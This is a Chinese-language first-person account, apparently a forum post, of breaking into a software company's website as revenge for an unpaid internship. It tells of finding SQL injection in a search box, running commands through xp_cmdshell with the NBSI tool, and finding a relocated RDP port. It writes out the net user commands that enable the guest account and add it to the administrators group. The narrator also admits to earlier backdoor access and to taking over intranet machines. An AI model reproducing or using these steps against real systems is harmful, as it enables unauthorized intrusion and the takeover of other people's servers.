话说上学期我们班上十几个同学被老师推荐到XX软件外包公司时行两天的短暂实习（其实就差不多是让我们做体力活），由于完成任务的质量不是很好。所以没给我们任何工资。同学那个气愤呀。。于是乎第二天就对其公司网站进行检测。很顺利的拿到了服务器3389权限（是有前人进去了，留了shift后门，绕了一大圈）。进去后也没做啥，也就抓几台他们内网的肉鸡玩玩，后来网站又给别人黑了。首页都不能正常打开，服务器管理员恢复了过后我所有的权限都不在了，也罢，这不现在无意中又来到这个网站了。还是先从web找漏洞吧。。测试了几个链接，果然没有明显注入点。就东点点，西看看。发现有个搜索功能。

在搜索框里输入了个单引号'，立即出现了报错页面。很明显的没有过虑。呵呵。

这下好办了。马上构造注入点http://www.xxxx.com/cn/Aboutxxx/NewsSearchResult.aspx?s=5拿到NBSI里去检测。不一会结果就出来了。还是用SA连接的数据库呢。从列目录的对照性来看，web服务器和数据库服务器没有分离。试试NBcommander执行命令。netstat -an看开放了哪些端口，运气不错，管理员没禁用xp_cmdshell,还可以执行且还有回显。但看不清楚。。

这个好办，win+r输入notepad打开记事本，将结果粘贴，再ctrl+h将 全部替换为空格

这下看得清楚了。

看到那个8899端口，直觉给我说那是管理员将3389改成了8899的。CMD里面打入mstsc -v www.xxx.com:8899,成功出现登陆界面，

回到NBSI里执行net user guest /acitve:yes将guest启用。net localgroup administrators guest /add

net user guest 442685579admi520加为管理员组并改密码，顺利登陆。。。

最后发了个email通知管理员。。

刚才又进去看了下。内网安全不是很好呀。